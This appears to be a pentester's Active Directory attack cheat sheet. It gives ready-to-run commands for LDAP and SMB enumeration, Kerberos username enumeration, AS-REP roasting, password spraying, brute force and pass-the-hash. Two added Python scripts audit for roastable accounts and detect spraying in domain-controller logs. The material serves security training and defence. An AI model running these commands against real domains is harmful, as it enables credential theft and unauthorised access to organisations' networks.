AD enum and hacking write-ups
AD enum and exploit: https://medium.com/@navkang/active-directory-enumeration-and-exploitation-for-beginners-604a32f45011
Attacking Kerberos: https://medium.com/@navkang/attacking-kerberos-e2b1be3dbbe9
Post Exploit: https://medium.com/@navkang/post-exploitation-windows-ad-2e608c7858dc
AD ROADMAP
- DNS query: nslookup <IP> <IP>, then follow up with dig axfr (zone transfer)
- Nmap scan, AD set: make note of remote-access ports, web servers, SMB/LDAP ports
- enum4linux/smbclient: run against every box with no creds. Does it list shares? And more
- /etc/hosts: add the domain to it when you find one
- ldapsearch: start general, dig deeper to find creds/users
- Remote AD tools:
  - Kerbrute: username enum, password spray (crackmapexec too)
  - GetNPUsers.py
  - GetUserSPNs.py
- Try psexec/evil-winrm if you have found creds (log into the web portal, try to escalate privileges further)
- ONCE IN! ENUMERATE HARDER
- BloodHound (SharpHound): fantastic enumeration
- Mimikatz: upload it, try to get hashes / PTT / OPTH
- Use crackmapexec to test any usernames; if they come back positive, log in via RDP
- RDP/evil-winrm, or TRY SSH and smbclient!
- Verify any creds you have!
- Repeat the process when you get into any new box with a new user
BloodHound/neo4j are invaluable tools!
Other tools needed:
- Impacket (some of the scripts below are included within Impacket)
- ldapsearch
- ldapdomaindump
- Mimikatz
- secretsdump.py
- Kerbrute
Hacking methodology
Initial stages:
enumerate DNS with gobuster:
gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt
run the nmap LDAP scripts against the DC:
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>
ldapsearch: check if the DC allows anonymous LDAP bind (-x = simple auth, here with no credentials, i.e. anonymous):
ldapsearch -h 10.10.10.10 -p 389 -x -b "dc=xxx,dc=xxx"
(newer OpenLDAP builds have dropped -h/-p; use -H ldap://10.10.10.10:389 instead)
then use windapsearch to enumerate further (-U = enumerate all users):
windapsearch.py -d xxx.xxx --dc-ip 10.10.10.10 -U
null and guest access:
enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>
smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //
user enum: invalid usernames come back as KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, which is how the KDC gives away which names exist
./kerbrute_linux_amd64 userenum -d lab.ropnop.com --dc 10.10.10.10 usernames.txt
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>
if you know one or more usernames but no passwords: ASREPRoast or password spray.
ASREPRoast, using Linux:
# Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
# Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
using Windows:
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose   # From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
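The accounts these tools pick up are the ones with "Do not require Kerberos preauthentication" set (the DONT_REQ_PREAUTH bit, 0x400000, in userAccountControl), so the same condition is what a defender audits for. The script below is an added example, not part of these notes or of any of the tools listed: it parses LDIF-style output of the kind ldapsearch produces and lists the accounts exposed to AS-REP roasting. The userAccountControl bit values and attribute names are the real AD ones; the directory tree, account names and values in the sample are constructed.

```python
# Added example, not part of the original notes: audit which accounts are
# exposed to AS-REP roasting (Kerberos pre-authentication disabled).
# The userAccountControl bit values are the real AD ones; the LDIF sample
# below is constructed to look like ldapsearch output, and every account
# name in it is made up.
from typing import Dict, List

# Subset of userAccountControl flags, keyed by bit value.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# Constructed sample of what
#   ldapsearch -x -H ldap://<DC IP> -b "dc=lab,dc=local" "(objectClass=user)" \
#       sAMAccountName userAccountControl
# returns; the tree, names and values are invented.
SAMPLE_LDIF = """\
dn: CN=svc-backup,OU=Service,DC=lab,DC=local
sAMAccountName: svc-backup
userAccountControl: 4260352

dn: CN=jdoe,OU=Users,DC=lab,DC=local
sAMAccountName: jdoe
userAccountControl: 66048

dn: CN=old-vpn,OU=Users,DC=lab,DC=local
sAMAccountName: old-vpn
userAccountControl: 4260354

dn: CN=Administrator,CN=Users,DC=lab,DC=local
sAMAccountName: Administrator
userAccountControl: 66048
"""


def parse_ldif(text: str) -> List[Dict[str, str]]:
    """Split LDIF-style output into one dict of attribute -> value per entry."""
    entries: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#") or ": " not in line:
            continue  # comments, search-result footer, etc.
        key, value = line.split(": ", 1)
        current[key] = value
    if current:
        entries.append(current)
    return entries


def decode_uac(value: int) -> List[str]:
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(entries: List[Dict[str, str]], include_disabled: bool = False) -> List[str]:
    """Accounts whose DONT_REQ_PREAUTH bit is set.

    Disabled accounts are skipped by default: the KDC will not issue them a
    TGT, so they cannot be roasted, but they are still worth cleaning up.
    """
    found = []
    for e in entries:
        uac = int(e.get("userAccountControl", "0"))
        if not uac & DONT_REQ_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(e["sAMAccountName"])
    return found


if __name__ == "__main__":
    for e in parse_ldif(SAMPLE_LDIF):
        flags = ", ".join(decode_uac(int(e["userAccountControl"])))
        print(f'{e["sAMAccountName"]:15} {flags}')
    print("AS-REP roastable:", asrep_roastable(parse_ldif(SAMPLE_LDIF)))
```

Against a live directory the same bit can be asked for directly with the bitwise-AND matching rule, `(userAccountControl:1.2.840.113556.1.4.803:=4194304)`, which saves pulling every user. The fix for anything the audit turns up is to clear the pre-auth flag (it is almost never needed outside old non-Windows Kerberos clients) and, where it must stay, give the account a long random password so the AS-REP hash is not crackable.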
Password spraying:
Kali:
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local auth spray (once you have found a local admin password or hash)
## --local-auth flag indicates to only try once per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
kerbrute:
# Password spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority; done
Windows:
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
# check passwords for all users in the current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
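Both the Kerberos username enumeration above (kerbrute userenum, krb5-enum-users) and the Kerberos-based spraying (kerbrute passwordspray, Rubeus brute) leave a clear trail on the domain controller: each unknown principal is a 4768 event with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), and each wrong password is a 4771 event with failure code 0x18 (KDC_ERR_PREAUTH_FAILED). The script below is an added example, not part of these notes or of any listed tool: it runs over a constructed export of such events and flags a source that hits many unknown names, or fails pre-auth for many different accounts, inside one time window. The event IDs and codes are the real Windows ones; the CSV layout, the thresholds, the window, the IPs and the account names are assumptions for the example.

```python
# Added example, not part of the original notes: spot the two attacks the
# notes describe, Kerberos username enumeration and password spraying, in
# domain-controller Security log events. Event IDs and result codes are the
# real Windows ones (4768 = TGT requested, 4771 = pre-auth failed,
# 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN, 0x18 = KDC_ERR_PREAUTH_FAILED); the
# log lines, IPs and account names below are constructed, in a simple
# CSV export format chosen for the example.
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed export: timestamp,event_id,result_code,account,client_ip
SAMPLE_LOG = """\
2024-03-01T09:00:01,4768,0x6,administrator,10.10.14.5
2024-03-01T09:00:01,4768,0x6,admin,10.10.14.5
2024-03-01T09:00:02,4768,0x6,backup,10.10.14.5
2024-03-01T09:00:02,4768,0x0,jdoe,10.10.14.5
2024-03-01T09:00:03,4768,0x6,test,10.10.14.5
2024-03-01T09:00:03,4768,0x6,guest,10.10.14.5
2024-03-01T09:05:00,4771,0x18,jdoe,10.10.14.5
2024-03-01T09:05:01,4771,0x18,asmith,10.10.14.5
2024-03-01T09:05:02,4771,0x18,bjones,10.10.14.5
2024-03-01T09:05:03,4771,0x18,svc-backup,10.10.14.5
2024-03-01T09:30:00,4771,0x18,jdoe,10.10.20.7
2024-03-01T09:31:00,4771,0x18,jdoe,10.10.20.7
2024-03-01T09:31:30,4768,0x0,jdoe,10.10.20.7
"""

Event = Tuple[datetime, str]  # (timestamp, account)


def parse_events(text: str) -> Dict[str, Dict[str, List[Event]]]:
    """Bucket failures per source IP: 'unknown' (4768/0x6) and 'badpw' (4771/0x18)."""
    buckets: Dict[str, Dict[str, List[Event]]] = defaultdict(lambda: defaultdict(list))
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, code, account, ip = line.split(",")
        when = datetime.fromisoformat(ts)
        if event_id == "4768" and code == "0x6":
            buckets[ip]["unknown"].append((when, account.lower()))
        elif event_id == "4771" and code == "0x18":
            buckets[ip]["badpw"].append((when, account.lower()))
    return buckets


def max_distinct_in_window(events: List[Event], window: timedelta) -> int:
    """Largest number of distinct accounts seen within any `window`-long span."""
    events = sorted(events)
    counts: Counter = Counter()
    best = lo = 0
    for ts, account in events:
        counts[account] += 1
        # Slide the left edge forward until the span fits inside the window.
        while ts - events[lo][0] > window:
            old = events[lo][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            lo += 1
        best = max(best, len(counts))
    return best


def detect(text: str, window: timedelta = timedelta(minutes=10),
           enum_threshold: int = 5, spray_threshold: int = 4) -> List[dict]:
    """Flag sources that probe many unknown principals (enumeration) or fail
    pre-auth for many different accounts (spraying) inside one window.

    Two failures for one account from 10.10.20.7 are a typo, not an attack,
    and stay under both thresholds.
    """
    findings = []
    for ip, kinds in parse_events(text).items():
        n = max_distinct_in_window(kinds["unknown"], window)
        if n >= enum_threshold:
            findings.append({"source": ip, "type": "username_enumeration", "distinct_accounts": n})
        n = max_distinct_in_window(kinds["badpw"], window)
        if n >= spray_threshold:
            findings.append({"source": ip, "type": "password_spray", "distinct_accounts": n})
    return sorted(findings, key=lambda f: (f["source"], f["type"]))


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f'{f["source"]}: {f["type"]} across {f["distinct_accounts"]} accounts')
```

Counting distinct accounts per source rather than failures per account is the point: a spray stays under the lockout threshold for every single user, so per-account lockout policy never fires, but the fan-out from one client IP is unmistakable. The crackmapexec smb and rpcclient variants above authenticate over SMB/NTLM instead of Kerberos, so for those the same logic applies to 4625 on the target hosts and 4776 on the DC rather than 4771.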
To get a foothold:
use GetNPUsers.py to request a TGT for a user with pre-auth disabled and dump the hash:
GetNPUsers.py xxx.xxx/svc-user -dc-ip 10.10.10.10 -no-pass
PORTS:
- LDAP: 389
- RDP, WinRM: 3389, 5985
- RPC ports: use RPC tools
- SMB ports: use SMB tools
- DNS: 53
- Kerberos: 88
- ADWS: 9389
- Global Catalog: 3268, 3269